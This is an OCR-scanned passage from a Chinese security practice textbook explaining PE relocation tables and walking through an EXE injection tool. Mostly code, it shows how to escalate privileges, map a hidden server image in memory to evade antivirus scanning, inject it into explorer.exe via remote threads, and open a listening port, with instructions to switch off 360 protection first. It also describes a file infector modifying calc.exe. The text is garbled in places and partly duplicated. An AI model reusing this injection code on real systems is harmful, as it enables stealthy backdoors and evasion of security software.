对 照 图 14-4 ,在 图 14-12 中 有 4 个 重 定位 表 , 如 表 14-4 所 示 。 重 定位 项 数目 计算 : 
(SizeOfBlock—8)/2—1, 


表 14-4 重 定位 表 
VirtualAddress SizeOfBlock 重 定位 项 数目 | 文件 偏 移 起 始 地 址 | 文件 偏 移 结束 地 址 
1 0x1000 0x148 160 0xF000 0xF147 
2 0x2000 0x080 60 OxF148 OxF1C7 
3 Ox3000 0x044 30 0xF1C8 0xF20B 
4 0x4000 Ox00C 2 OxF20C OxF217 


RddressOfNames++ ; 


AddressOfNameOrdinals++; 


Endfor 


6) 基 址 重 定位 表 


程序 默认 加 载 地 址 ImageBase 一 0x400000, 设 某 一 字符 串 String 的 存储 地 址 为 RV A 
(String) = 0x404002, 如 果 加 载 器 决定 将 程序 加 载 到 0x600000 处 时 ,产生 地 址 之 差 成 为 
delta 一 0x200000, 那 么 字符 串 位 置 应 该 为 RVA(String) = 0x604002, Windows 使 用 重 定 
位 机 制 处 理 上 述 情 况 , 即 链接 器 生成 PE 文件 的 时 候 将 编译 器 识别 的 重 定位 的 项 记录 在 一 
张 名 为 “ 重 定位 表 ” 里 ,并 将 表 的 RVR 保存 在 数据 目录 DataDirectory 中 ,序号 是 IMAGE_ 
DIRECTORY_ENTRY_BASERELOC。 通 常 需 重 定位 的 项 目 有 使 用 全 局 变量 的 指令 、 函 
数 指针 等 。 
文件 DEScipher. dat(sever. exe) 的 基 址 重 定位 表 的 虚拟 地 址 是 RA V =0x00012000, ,而 
大 小 为 0x0218, 由 公式 (14-1) 得 FRVA(Reloc) 二 0xF000, 对 应 的 数据 如 图 14-12 所 示 。 


0000F000 


00 10 00 00 48 01 00 00 


0000F 1 
0000F1 


20 
30 


4D 3E 54 3E 9D 3E A3 3E 
D8 3E ED 3E F8 3E 10 3F 


0000F140 


96 3F 98 3F BA 3F 00 00 


0000F150 
0000F1A0 
0000F 180 


58 30 SD 30 6F 30 8D 30 
|B1 34 BD 34 C7 34 CD 34 
El 35 4F 36 56 36 84 36 


0000F 1C0 


A2 36 A8 36 AE 36 00 00 


0000F1D0 
0000F1E0 

0000F1F0 
0000F200 


{OC 31 18 31 1C 31 4C 32 
08 35 OC 35 10 35 14 35 
B4 37 B9 37 6C 38 70 38 
B4 38 B8 38 D8 38 F4 38 


0000F2 


0000F220 


10 OC 00 00 00 2C 30 00 00 
00 00 00 00 00 00 00 00 


3D 30 43 30 59 30 9E 30 
AC 3E B3 3E BE 3E C4 3E 
26 3F 33 3F 70 3F 75 3F 
00 20 00 00 80 00 00 00 
A1 30 A7 30 10 31 16 31 
D3 34 D9 34 20 35 DA 35 
BA 36 90 36 96 36 9C 36 


00 30 00 00 44 00 00 00 


50 32 54 32 58 32 SC 32 
18 35 1C 35 C4 36 C8 36 
78 38 7C 38 94 38 98 38 
F8 38 00 00 00 40 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 


B 14-12 基 址 重 定位 表 的 原始 数据 


基 址 重 定位 表 IMAGE_BASE_RELOCATION 结构 定义 如 下 。 


typedef struct _IMAGE BASE RELOCATION { 


DWORD VirtualAddress; 


DWORD SizeOfBlock; 
// WORD TypeOffset[1]; 
JIMAGE_BASE_RELOCATION; 


// 页 起 始 地 址 RVR 


// 当 前 表 块 的 大 小 
// 数 组 ,每 项 占 两 个 字 节 代 表 一 个 重 定位 项 ,最 后 一 项 为 0 


对 照 图 14-4 ,在 图 14-12 中 有 4 个 重 定位 表 , 如 表 14-4 所 示 。 重 定位 项 数目 计算 : 
(SizeOfBlock—8)/2—1, 


表 14-4 重 定位 表 
VirtualAddress SizeOfBlock 重 定位 项 数目 | 文件 偏 移 起 始 地 址 | 文件 偏 移 结束 地 址 
1 0x1000 0x148 160 0xF000 0xF147 
2 0x2000 0x080 60 OxF148 OxF1C7 
3 Ox3000 0x044 30 0xF1C8 0xF20B 
4 0x4000 Ox00C 2 OxF20C OxF217 


实践 教程 


TypeOffset 中 每 一 个 WORD 的 低 12 位 代表 基 址 重 定位 项 的 位 置 偏 移 , 最 高 4 位 是 基 
址 重 定位 项 的 型 态 ,0 表示 该 项 无 意义 ,3 表示 需要 重 定位 。 例 如 “3D 30”0x303D, 二 进 制 
(11000000111101), 低 12 位 值 为 0x3D, 再 加 上 VirtualAddress, W) RVA = 0x103D. 而 
FRVA(RVA) 一 0x43D。 当 PE 加 载 到 内 存 后 ,“3D 30” 重 定位 项 的 内 存 地 址 为 : 
RVA(3D 30) 王 0x103D 十 ImageBase 十 delta 一 0x103D 十 0x400000 十 0x200000 
二 0x60103D 


5. 实践 操作 


1) 程序 框架 

DLL 注入 的 方法 比较 常见 也 比较 容易 ( 见 实践 8) ,而 EXE 注入 比较 复杂 也 更 隐蔽 , 实 
践 采用 验证 性 代码 说 明 其 可 行 性 ,即将 sever. exe 注入 到 其 他 进程 如 explorer. exe 中 等 。 实 
践 涉及 以 下 几 个 主要 文件 。 

(1) testcom. h 和 testcom. cpp: 定义 主 函 数 ,实现 加 载 资 源 ,调用 类 CMemLoadDll 的 
函数 。 

(2) MemLoadDIl. h 和 MemLoadDIl. cpp: 模拟 Windows 的 PE 加 载 器 ,实现 在 内 存 中 
直接 加 载 DLL 调用 MemLoadLibrary, 这 样 就 不 必 在 硬盘 上 留 下 文件 ,以 便 规避 杀毒 软件 
的 文件 扫描 。 以 MemLoadLibrary 为 参考 ,定义 MemLoadExe 函数 以 在 内 存 中 直接 实现 
EXE 注入 。 

(3) sever. h 和 sever. cpp: 被 注入 的 EXE 文件 。 在 文件 sever. cpp 中 定义 了 一 个 
ServiceMain 导出 函数 , 即 “extern "C" __declspec (dllexport) void ServiceMain (void * 
para);”。 在 EXE 文件 中 定义 导出 函数 和 DLL 文件 没什么 区 别 ,只 是 不 能 重 定位 和 调用 时 
不 能 使 用 LoadLibrary 而 已 。 

VS2008 编译 程序 时 ,默认 不 产生 重 定位 节 。 设 置 方法 :“ 项 目 ” 一 “sever 属性 ”一 “配置 
属性 ”一 “链接 器 ”一 “高 级 ”, 如 图 14-13 所 示 。 


调试 随机 基 址 启用 喘 像 随机 化 /DYNAMICBASE) 
C/C++ 固定 基 址 生成 重 定位 节 (/FIXED:NO) 
pan ROEP) BES DEP SSSUNXCOMPAT 


14-13 设置 重 定位 节 


可 执行 程序 testcom. exe 的 作用 是 将 sever. exe 注入 到 其 他 进程 中 。 在 VS2008 开发 
环境 下 ,sever. exe 改名 为 DEScipher. dat, 作为 testcom 资源 文件 放 在 res 的 目录 下 。 在 
Win32 项 目 中 添加 资源 的 方法 : 在 “解决 方案 资源 管理 器 "中 右 击 testcom 根 目录 一 “添加 ”一 
“资源 ”, 弹 出 “添加 资源 对话 框 , 单 击 “导入 ”按钮 ,选择 文件 DEScipher. dat, 则 弹出 “ 自 定义 
资源 类 型 "对话 框 ,输入 *"DAT"” 类 型 即 可 ,如 图 14-14 所 示 ,并 生成 资源 文件 testcom. rc, 
包含 如 下 的 内 容 : 二 IDR_DAT DAT "res\\DEScipher. dat" 之 。 其 中 IDR_DAT 在 
resource. h 中 定义 : # define IDR_DAT101, 


[ARSE eon GT 上 E 
[P Œ testcom 


2014/8/3 1923 
2014/8/3 1923 

2014/8/3 1923 

2014/8/3 1923 gg 
2013/10/1 1259 


图 14-14 ”添加 资源 
2) EXE 注入 流程 
主 程序 Testcom 处 理 流程 主要 如 下 。 
(1) 提升 程序 权限 以 确保 具有 注入 的 权限 。 
DebugPrivilege( SE_DEBUG NAME, TRUE) ; // 令 牌 seDebugPrivilege, 允许 进程 调试 任何 进程 
DebugPrivilege(SE_SECURITY_ NAME, TRUE) ; // 令 牌 SeSecurityPrivilege, 允许 进程 访问 安全 日 志 
DebugPrivilege(SE_TCB_NAME, TRUE) 7 // 令 牌 seTcbPrivilege, 允许 设置 允许 进程 采用 任何 


用 户 的 标识 来 获取 对 该 用 户 被 授权 访问 的 资源 的 访问 权限 
DebugPrivilege(SE_LOCK_MEMORY_NAME, TRUE); // 令 牌 SeLockMemoryPrivilege, 允许 使 用 进程 在 物理 
内 存 中 保存 数据 ,从 而 避免 系统 将 这 些 数据 分 页 保存 到 磁盘 的 虚拟 内 存 中 


具体 用 到 的 系统 函数 有 LookupPrivilegeValue、OpenProcessToken 和 AdjustTokenPrivileges 。 
(2) 读 取 资源 信息 。 由 testcom. cpp 中 的 函数 LoadRES() 完 成 ,代码 如 下 。 


HINSTANCE hinst = GetModuleHandle(0) ; // 获 取 当 前 进程 的 模块 句柄 
HRSRC hr = NULL; 

HGLOBAL hg = NULL; 

hr = FindResource(hinst,MAKEINTRESOURCE(IDR_DAT),"DAT"); // 获 取 资 源 句柄 


DWORD dwSize = SizeofResource(hinst, hr); // 获取 资源 的 大 小 

hg = LoadResource(hinst, hr); // 加 载 资源 

LPVOID pBuffer = (LPSTR)LockResource(hg); ” // 锁 定 资源 , pBuffer 包含 sever. exe 的 内 存 缓冲 区 
MemLoadD11 * pMemLoadD11 = new CMemLoadD11( ) ; // 声 明 类 指针 

pMemLoadD11 — > MemLoadRemoteExe( pBuffer, dwSize); // 处 理 sever. exe 的 PE 文件 
FreeResource( hg); // 释 放 资 源 


(3) 按照 PE 文件 在 内 存 中 的 方式 展开 ,由 类 函数 CMemLoadDll:: MemLoadRemoteExe 


完成 ,依次 调用 以 下 几 个 函数 。 


实践 教程 


O 检查 缓冲 区 中 的 数据 是 否 为 有 效 的 PE 文件 ,函数 定义 如 下 。 


CheckDataValide(void * lpFileData, int DataLength) 


其 中 ,lpFileData 存放 exe 数据 的 内 存 缓冲 区 ,DataLength 是 exe 文件 的 长 度 。 主 要 检 
Æ DOS 头 的 标记 MZ(4D5A) PE 头 的 标记 PE00(50450000) ,数据 长 度 的 合法 性 。 
该 函数 还 初始 化 与 PE 格式 相关 的 类 成 员 PIMAGE_DOS_HEADER。 


pDosHeader; PIMAGE_NT_HEADERS pNTHeader; PIMAGE SECTION_ HEADER pSectionHeader; 


@ 计算 所 需 的 加 载 空间 ,函数 定义 如 下 。 


int CMemLoadD11: :CalcTotalImageSize() 

// 段 对 齐 字 节 数 0x1000 

int nAlign = PNTHeader - > OptionalHeader. SectionAlignment; 

// 计算 所 有 头 的 尺寸 .包括 dos coff pe 头 和 段 表 的 大 小 

intSize = GetAlignedSize(pNTHeader — > OptionalHeader. SizeOfHeaders, nAlign); 
GetAlignedSize 的 计算 公式 : 

(SizeOfHeaders + nhlign - 1) /nhlign x nAlign 

= (0x400 + 0x1000 — 1) /0x1000 * 0x1000 = 0x1000; 


其 中 : SectionAlignment: 当 加 载 进 内 存 时 节 的 对 齐 值 (以 字 节 计 ), 它 必须 三 
FileAlignment, 默 认 是 相应 系统 的 页 面 大 小 , 即 4096 字 节 。 


SizeOfHeaders: 所 有 头 的 总 大 小 ,向 上 舍 人 为 FileAlignment 的 倍数 ,可 以 以 此 值 作为 
PE 文件 第 一 节 的 文件 偏 移 量 0x400。 


计算 所 有 节 的 大 小 , 取 其 中 最 大 的 节 大 小 ,代码 如 下 。 


for(int i= 0; i< pNTHeader — > FileHeader. NumberOfSections; ++i){ //5 个 节 
int CodeSize = pSectionHeader[i].Misc.VirtualSize ; 
int LoadSize = pSectionHeader[i].SizeOfRawData; 
int MaxSize = (LoadSize > CodeSize)?(LoadSize):(CodeSize); 
int SectionSize = GetAlignedSize(pSectionHeader[i].VirtualAddress + MaxSize, nAlign); 
if(Size < SectionSize) Size = SectionSize; // 取 较 大 的 节 


其 中 : 

VirtualSize: 当 加 载 进 内 存 时 这 个 节 的 总 大 小 。 如 果 此 值 比 SizeOfRawData 大 ,多 出 
的 部 分 用 0 填充 。 这 是 节 的 数据 在 没有 进行 对 齐 处 理 前 的 实际 大 小 ,不 需要 内 存 对 齐 。 

SizeOfRawData: 磁盘 文件 中 已 初始 化 数据 的 大 小 。 必 须 是 FileAlignment 域 的 倍数 。 

VirtualAddress: 内 存 中 节 相 对 于 镜像 基 址 的 偏 移 。 必 须 是 SectionAlignment 的 整数 倍 。 

从 图 14-4 中 可 得 最 大 节 计 算 : VirtualAddress 一 0x12000,MaxSize 一 0x400。 

(0x12000 十 0x400 十 0x1000 一 1)/0x1000 * 0x1000=0x13000 
即 是 页 面 大 小 0x1000(4096) 字 节 的 整数 倍 。 
© 打开 被 注入 的 进程 ,在 进程 空间 内 及 本 地 空间 内 分 配 ImageSize 一 0x12000 虚拟 内 


存 , 代 码 如 下 。 


// 根 据 命令 行 传 人 的 进程 ID, 打开 进程 
hProcess = OpenProcess( 
PROCESS_ QUERY INFORMATION | 


PROCESS_CREATE_THREAD | // For CreateRemoteThread 
PROCESS VM OPERATION | // For VirtualAllocEx/VirtualFreeEx 
PROCESS_VM_WRITE, // For WriteProcessMemory 
FALSE, dwProcessId); // 进 程 ID 

void * pRemoteAddress = VirtualAllocEx(hProcess, NULL, ImageSize, MEM_COMMIT |MEM_RESERVE, 
PAGE_EXECUTE_READWRITE) ; // 远 程 进程 分 配 虚 拟 内 存 

void * pMemoryAddress = VirtualAlloc( (LPVOID)NULL, // 本 地 分 配 虚拟 内 存 

ImageSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) ; 

CopyDllDatas(pMemoryAddress, lpFileData); // 复 制 并 对 齐 各 个 段 


// 修 改 pMemoryAddress 内 存 属性 为 可 执行 代码 ,应 用 程序 可 以 读 写 该 区 域 
VirtualProtect(pMemoryAddress, ImageSize, PAGE EXECUTE READWRITE, &old); 


@ 在 pMemoryAddress 所 指向 的 内 存 中 对 齐 各 个 段 ,图 14-15 所 示 为 内 存 对 齐 的 解析 


图 ,图 中 lpFileData 和 pMemoryAddress 的 值 是 动态 的 。 


高 端 地址 :0x13000 


文件 尾 :0xF400 


SERVESH 
z 
š 
FENANS 


文件 头 IpFileData=0x00ffs0a8  pMemoryAddress=0x002C0000 
内 存 复制 文件 内 存 对 齐 


14-15 PE 程序 加 载 映像 解析 图 


实现 函数 为 “void CopyDllDatas(void * pDest, void* pSrc);”, 实 现代 码 如 下 。 


int HeaderSize = pNTHeader -> OptionalHeader. SizeOfHeaders; //0x400=1024 字 节 
int SectionSize = pNTHeader — > FileHeader. NumberOfSections * 
sizeof (IMAGE_SECTION_HEADER); //5x40 = 200 字 节 


实践 教程 


int MoveSize = HeaderSize + SectionSize; //PE 头 + 节 表 字 节 数 : 1024 + 200 = 1224 字 节 
memmove(pDest, pSrc, MoveSize); // 复 制 PE 头 和 节 信息 
for(int i= 0; i < pNTHeader 一 >FileHeader. NumberOfSections; ++i){ // 复 制 每 个 节 
if(pSectionHeader[i].VirtualAddress == 0 || 
pSectionHeader[ i]. Size0fRawData == 0) continue; 
// 定位 该 节 在 内 存 中 的 位 置 
void * pSectionAddress = (void * )((unsigned long)pDest + 
pSectionHeader[ i]. VirtualAddress); 
memmove( (void * )pSectionAddress, (void * )((DWORD)pSrc + 
pSectionHeader[ i]. PointerToRawData) , 
pSectionHeader[ i]. SizeOfRawData) ; // 复 制 节 数据 到 虚拟 内 存 
Į 
// 修 正 指针 ,指向 新 分 配 的 内 存 ,新 的 DOS 头 
pDosHeader = (PIMAGE DOS_ HEADER)pDest; 
// 新 的 如 头 地 址 ，e_lfanew = 0x100 
pNTHeader = (PIMAGE NT_HERADERS) ( (int)pDest + (pDosHeader -> e_lfanew)); 
pSectionHeader = ( PIMAGE_SECTION_HEADER) ( ( int)pNTHeader + sizeof ( IMAGE_NT_HEADERS) ) ; 
// 新 的 节 表 地 址 , sizeof ( IMAGE_NT_HEADERS) ) = 0xF8 


© 将 pMemoryAddress 内 存 中 整理 完 的 PE 映像 写 入 待 注入 进程 的 pRemoteAddress 
内 存 区 域 ,实现 函数 如 下 : 


WriteProcessMemory(hProcess, pRemoteAddress, pMemoryAddress, ImageSize, &lpwrite)); 


© EXE 的 内 存 复 制 在 其 他 进程 中 启动 ,需要 遍历 其 导入 表 载 入 所 有 的 DLL, 并 将 函数 
地 址 重新 定位 。 而 加 载 DLL 和 获取 函数 地 址 用 到 系统 库 kernel32. dll 中 的 导出 函数 
GetProcAddress 和 LoadLibrary. 

已 知 系统 库 kernel32. dll 在 内 存 中 的 加 载 地 址 对 所 有 进程 来 说 是 一 样 的 ,可 以 用 
Explorer Suite 工具 加 以 验证 ,如 图 14-16 所 示 ,ntdll. dll, USER32. dll 等 其 他 系统 DLL 的 
加 载 地 址 也 是 一 样 的 。Stu_PE 工具 打开 kernel32. dll 如 图 14-17 所 示 。 


图 UsER32 75830000 二 ADVAPI32 75C90000 
aao 75C40000 一 二 75810000 
图 LPK 76080000 图 sedhost 761E0000 
图 USPI0D 700000 S RPCRT4 75A60000 
加 msvat 75B10000 “I GDI32 75C40000 
加 ws> 3 sassa @]USER32 75830000 


图 14-16 Explorer Suite 工具 查看 进程 和 模块 


在 本 地 进程 空间 获取 kernel32. dll 中 GetProcAddress, LoadLibrary 和 lstrcmp 函数 的 
地 址 ,并 作为 参数 传 给 ServiceMain 函数 。 获 取 函 数 地 址 有 两 种 方法 ,一 是 直接 获取 ,二 是 
在 kernel32. dll 文件 的 内 存 映 像 中 扫描 其 导出 表 , 提 取 所 需 函 数 地 址 。 前 一 种 方法 方便 简 


单 ,但 容易 从 其 导入 表 中 查 出 程序 所 调用 的 函数 ,而 后 一 种 方法 则 比较 隐蔽 和 复杂 。 直 接 获 
取 函 数 地 址 代码 如 下 。 


DWORD strcmp_add = (DNORD)l1strcmp; 
DWORD LoadLibrary add = (DWORD)LoadLibraryA; 
DWORD GetProcAddress_add = (DWORD)GetProcAddress; 


第 二 种 方法 在 函数 GetFunAdress() 中 实现 ,代码 如 下 。 


BOOL CMemLoadD11: :GetFunAdress(){ 
PIMAGE DOS_HEADER pDosHeader; 
PIMAGE_NT_HEADERS pNtHeader; 
PIMAGE_EXPORT_DIRECTORY pExportDirectory; 
HMODULE hMod = GetModuleHandle("kerne132.d11"); //0x77140000 
pDosHeader = (PIMAGE DOS HEADER)hMod; //pos 头 
pNtHeader = (PIMAGE NT HEADERS)((PBYTE)hMod + pDosHeader -> e_lfanew); 
//PE 3k 0x771400f0 
pExportDirectory = PIMAGE_EXPORT_DIRECTORY(pNtHeader - > OptionalHeader. 
DataDirectory[0].VirtualAddress + (PBYTE)hMod); //0x771f56e4 
// 函 数 名 称 表 指针 0x771f6c5c 
PDWORD pAddressName = PDWORD( (PBYTE)hMod + pExportDirectory— > Address0fNames) ; 
// 函 数 名 称 序号 表 指 针 0x771f81ac 
PWORD pAddressOfNameOrdinals = (PWORD) ( (PBYTE)hMod + pExportDirectory — > AddressOfNameOrdinals); 
// 函 数 地 址 表 指 针 0x771f570c 
PDWORD pAddresOfFunction = (PDWORD) ( ( PBYTE) hMod + PExportDirectory 一 > RddressOfFunctions) ; 
// 人 遍历 所 有 导出 函数 , 共 1364 个 ,比较 查找 函数 
for (DWORD i = 0; i < pExportDirectory- > NumberOfNames; i ++){ 
PCHAR pFunc = (PCHAR)((PBYTE)hMod + * pAddressName++ ); 
if (0 == strcmp(pFunc, "GetProcAddress")) 
break; 
pAddressOfNameOrdinals++; 


GetProcAddress_add // 地 址 0x7718CD44 = 0x77140000 + 0x04CD44 
= (DWORD)hMod + (DWORD)pAddresOfFunction[ * pAddressOfNameOrdinals]; 


图 14-17 可 以 有 助 于 代码 的 对 照 理 解 。 同 理 计算 导 出 函数 LoadLibrary 和 lstremp 的 
内 存 地 址 。 另 外 用 Dependency Walker 工具 打开 kernel32. dll, 可 以 查看 导出 函数 
GetProcAddress 的 信息 ,如 图 14-18 所 示 。 

© 获取 注入 EXE 映像 的 导出 ServiceMain 函数 地 址 。 

先 在 本 地 pMemoryAddress 内 存 空间 内 获取 导出 表 中 的 ServiceMain 函数 地 址 。 


SMain= (lpAddFunMain)MemGetProcAddress("ServiceMain"); 


函数 MemGetProcAddress() 实 现 机 理 和 GetFunAdress() 一 样 ,读者 自行 分 析 。 然 后 


Ordinal Hint J Function ~ J Entry Point 

581 (0x0245)| 579 (0x0243)| GetprivateprofileStructW 0x000899DE 
582 (0x0246)| 580 (0x0244)| GetprocAddress 0x0004CD44 
E | 583 (0x0247)| 581 (0x0245)| GetProcessAffinityMask 0x00042CED 


图 14-18 导出 函数 GetProcAddress 
计算 ServiceMain 函数 在 被 注入 进程 空间 中 的 地 址 。 
SMain = (lpAddFunMain)( (DWORD)SMain + (DWORD)pRemoteAddress — ( DWORD) pMemoryAddress) ; 


© 在 远程 进程 中 写 人 参数 ,创建 远程 线程 并 启动 ServiceMain ,代码 如 下 。 


Spara s_pPara; 

s_pPara. pPara = pRemoteAddress; 

s_pPara. GetProcAddress_add = (void * )GetProcAddress_add; 

s_pPara. LoadLibrary_add = (void * )LoadLibrary_add; 

s_pPara. Strcmp_add = (void * )strcmp_add; 

strcpy(s_pPara. dllname, "user32. dll"); 

strcpy(s_pPara. funname, "MessageBoxA" ) ; 

strcpy(s_pPara. Mname, "MSVCR90. DLL" ) ; 

void * pParaAddress = VirtualAllocEx ( hProcess, NULL, sizeof (Spara), MEM _ COMMIT, PAGE _ 


READWRITE) ; // 在 远程 进程 内 分 配 虚拟 内 存 ,并 写 入 参数 s_pPara 
WriteProcessMemory(hProcess, pParaAddress, &s_pPara, sizeof(Spara), &lpwrite) 
CreateRemoteThread(hProcess, NULL, 0, // 启 动 ServiceMain| 


(PTHREAD_START_ROUTINE)SMain, pParaAddress, 0, NULL); 


3) EXE 线程 启动 


ServiceMain 启动 后 即 开始 遍历 其 导入 表 , 载 人 所 有 的 DLL 并 将 函数 地 址 重新 定位 。 
(1) 处 理 传 人 参数 。 


PSpara pp = (PSpara)para; 

// 定 义 函 数 指针 

typedef HMODULE (WINAPI * lpAddFun) (LPCSTR); 

typedef HMODULE (WINAPI * lpLoadLibrary) (LPCSTR); 

typedef FARPROC (WINAPI * lpGetProcAddress) (HMODULE, LPCSTR) ; 
typedefint (WINAPI * lpMessageBox) (HWND, LPCTSTR, LPCTSTR, UINT) ; 


typedefint (WINAPI * lpstrcmp)(char * lpStringl,char * lpString2); 

// 为 函数 指针 赋值 

lpLoadLibrary Fun_LoadLibraryA = (lpLoadLibrary)pp — > LoadLibrary add; 
lpGetProcAddress Fun_GetProcAddress = ( 1pGetProchddress)pp - > GetProcAddress_add; 
lpstrcmp Fun_strcmp = (lpstrcmp)pp— > Strcmp_add; 

hD11 = Fun_LoadLibraryA(pp — > dllname) ; // 加 载 user32.d11 

// 提 取 user32. d11 导出 的 MessageBox 函数 地 址 

lpMessageBox myMessageBox = (lpMessageBox)Fun GetProcAddress(hDll, pp — > funname); 


(2) 处 理 重 定位 表 。 


void* pImageBase = pp 一 > pPara; //PE 映像 加 载 基地 址 
pDosHeader = (PIMAGE DOS_HEADER)pImageBase; //DOS 头 地 址 
//PE 头 地 址 


pNTHeader = (PIMAGE_NT_HEADERS)((int)pImageBase + (pDosHeader 一 > e_lfanew)); 
pSectionHeader = (PIMAGE_SECTION_HEADER) 
((int)pNTHeader + sizeof(IMAGE_NT_HEADERS)); // 新 的 节 表 地 址 
if ( pNTHeader - > OptionalHeader. DataDirectory [ IMAGE _ DIRECTORY _ ENTRY _ BASERELOC ] . 
VirtualAddress > 0&&pNTHeader — > OptionalHeader. DataDirectory [ IMAGE _ DIRECTORY _ ENTRY _| 
BASERELOC].Size>0) { 
// 计 算 基地 址 的 差 值 
DWORD Delta = (DWORD)pImageBase— pNTHeader - > OptionalHeader. ImageBase; 
PIMAGE BASE RELOCATION pLoc = (PIMAGE BASE RELOCATION)( (unsigned long) 
pImageBase + PNTHeader - > OptionalHeader. DataDirectory [IMRGE | 
DIRECTORY_ENTRY_BASERELOC]. VirtualAddress); 
while( (pLoc -> VirtualAddress + pLoc 一 > SizeOfBlock) != 0) 
{// 开 始 扫描 重 定位 表 
WORD * pLocData = (WORD * )((int)pLoc + sizeof(IMAGE_BASE_RELOCATION) ); 
// 计算 本 节 需 要 修正 的 重 定位 项 (地 址 ) 的 数目 
int NumberOfReloc = (pLoc -> SizeOfBlock- 
sizeof( IMAGE_BASE_RELOCATION) ) /sizeof (WORD) ; 
for(int i=0 ; i < NumberOfReloc; i++) 
{ // 检 查 取 重 定 项 的 高 4 位 是 否 等 于 3 
if( (DWORD) (pLocData[ i] & 0xF000) == 0x00003000) 
{ // 取 重 定 项 的 低 12 位 ,并 加 上 加 载 基地 址 和 页 RVA 
DWORD * pAddress = (DWORD * )((unsigned long)pImageBase + 
pLoc — > VirtualAddress + (pLocData[i] & OxOFFF)); 
* pAddress += Delta; // 重 定位 
1) // 转移 到 下 一 个 节 进 行 处 理 
pLoc = (PIMAGE_BASE_RELOCATION) ((DWORD)pLoc + Loc -> SizeOfBlock); 
) 


(3) 处 理 导 入 表 。 遍 历 导 入 表 ,重新 载 人 所 有 的 DLL 并 将 函数 地 址 重新 定位 。 


unsigned long Offset = pNTHeader - > OptionalHeader. DataDirectory 
[ IMAGE DIRECTORY ENTRY IMPORT]. VirtualAddress ; 
PIMAGE IMPORT DESCRIPTOR pID = (PIMAGE IMPORT DESCRIPTOR) 
( (unsigned long) pImageBase + Offset); 


实践 教程 


while(pID-> Characteristics != 0){ [AFAR 
PIMAGE_THUNK_DATA pRealIAT = (PIMAGE_THUNK_DATA) ( (unsigned long) 
pImageBase + pID- > FirstThunk); 
PIMAGE_THUNK_DATA pOriginalIAT = (PIMAGE THUNK DATA) 
( (unsigned long)pImageBase + pID- > OriginalFirstThunk); 
BYTE * pName = (BYTE * )((unsigned long)pImageBase + pID 一 > Name); //DLL 名 


hD11 = Fun LoadLibraryA (pName); // 加 载 DLL 
for(i=0; ;i++) ( // Bj DLL 的 导出 函数 
if(pOriginalIAT[i].ul.Function == 0) 

break; 


// 判 断 导 和 项 的 最 高 位 是 否 为 1, IMAGE_ORDINAL FLAG = 0x80000000 
if(pOriginalIAT[i].ul.Ordinal & IMAGE _ORDINRL FLAG){ 


lpFunction = Fun_GetProcAddress(hD11, // 按 序号 检索 函数 地 址 
(LPCSTR)(pOriginalIAT[i].ul.Ordinal & 0x0000FFFF)); 
}else{ // 最 高 位 为 0, 则 按照 函数 名 字 检 索 


PIMAGE_IMPORT_BY_NAME pByName = (PIMAGE IMPORT BY_NAME) 
( (DWORD)pImageBase + 
(DWORD) (pOriginalIAT[ i]. ul. AddressOfData) ); 
lpFunction = Fun_GetProcAddress(hD11, (char * )pByName — > Name); 
} 
pRealIAT[i].ul. Function = (DWORD) lpFunction; // 修 正 导入 表 项 

} 

pID = (PIMAGE IMPORT DESCRIPTOR)((DWORD)pID // 移 动 到 下 一 个 导入 表 
+ sizeof ( IMAGE_IMPORT_DESCRIPTOR) ) 


(4) 建立 网 络 连接 ,开始 在 端口 3300 进行 监听 。 

实践 操作 : 首先 暂时 退出 360 保护 ,然后 在 命令 行 输入 “testcom xxxx”, 其 中 xxxx 是 
explorer. exe 的 进程 编号 PID, 命 令 执 行 完毕 后 可 以 恢复 360 保护 ,再 打开 360 防火 墙 可 以 
看 到 explorer. exe 在 端口 3300 进行 监听 ,如 图 14-19 所 示 。 


j 


保护 网 连 。 局域网 防护 MEA maae 


当前 有 15 个 程序 已 连接 或 岩 试 连接 站 络 ， 共 建立 39 NHR PRÈRTIHUHAE O 


看 网 页 、 下载、 种 天 、 玩 网 络 亲 戏 时 会 建立 问 结 连接 ， 用 来 完成 与 对 方 的 联系 和 灼 据 传 运 。 您 可 以 查看 和 管理 连接 ， 提 高 网 络 安全 性 。 

Bz 安全 等 级 ”协议 本 地 P FGKO 目标 P 目标 端口 ”目标 pp 归属 地 状态 ”管理 
svchost.exe 安全 UDP 0.0.0.0 500 0.0.0.0 0 s 
explorer.exe zè TO 09000 3300 0.0.0.0 ° m S 

[E svchost.exe 室 全 TOP 0009 3389 0.0.0.0 0 ir & 


14-19 360 防火 墙 


4) EXE 感染 
“EXE 感染 器 . exe” 是 验证 感染 EXE 的 工具 ,如 图 14-20 所 示 。 将 一 段 代码 注入 到 
calc. exe 中 ,这 段 代 码 在 calc. exe 启动 前 先 弹 出 一 个 消息 对 话 框 , 单 击 “ 确 定 ” 按 钮 后 ,再 启 


动 calc. exe。 


用 Stud_PE 工具 打开 calc. exe 被 感染 前 后 的 节 信 息 , 可 以 发 现 calc. exe 被 感染 的 方式 


图 14-20 EXE 感染 过 程 


就 是 增加 了 一 个 新 节 “. xxx”, 并 设置 其 属性 为 可 执行 的 ,如 图 14-21 所 示 。 图 14-22 显示 了 
calc. exe 被 感染 前 后 程序 入 口 ,感染 前 EntryPoint =0x00012475, ,而 感染 后 EntryPoint = 
0x0001F061, 显 然 "“EXE 感染 器 . exe” 修 改 了 程序 入口 ,首先 执行 新 节 *. xxx” 代 码 ,新 增 代码 
运行 完 后 再 回 到 原来 的 程序 入 口 正 常 执行 。 


区 sud_pE operating on : "calc- 源 EXE* ik. fÑ sud pt operating on : aD O [= i | 
Fle Edit Tools Help 
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14-21 calc. exe 被 感染 前 后 的 节 信息 


_ (Ñi stud_PE operating on : "calc 源 EXE =k 
Fle Edit Tools Help 


(Ë Stud_PE operating on : "calc EXE" 
pe 文件 实验 Veale 源 ,exe | Fle Edit Tools Help 
© Headers | Y Dos | OSectior 
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14-22 calc. exe 被 感染 前 后 程序 入口 


随 书 配套 资料 中 包含 EXE 感染 器 的 源 代码 ,读者 可 自行 分 析 。 
6. 思考 题 


依据 EXE 手工 加 载 的 分 析 流 程 , 试 分 析 DLL 的 手工 注入 流程 和 代码 。 


Ek 15 Rootkit 技 术 


1. 实践 目的 
理解 和 掌握 Rootkit 技术 的 原理 和 工作 机 制 ,了 解 Bootkit 技术 。 
2. 实践 设备 


(1) ÆA Internet 的 计算 机 一 台 , 安 装 Windows XP, Windows 7 或 
Windows 8 等 操作 系统 。 
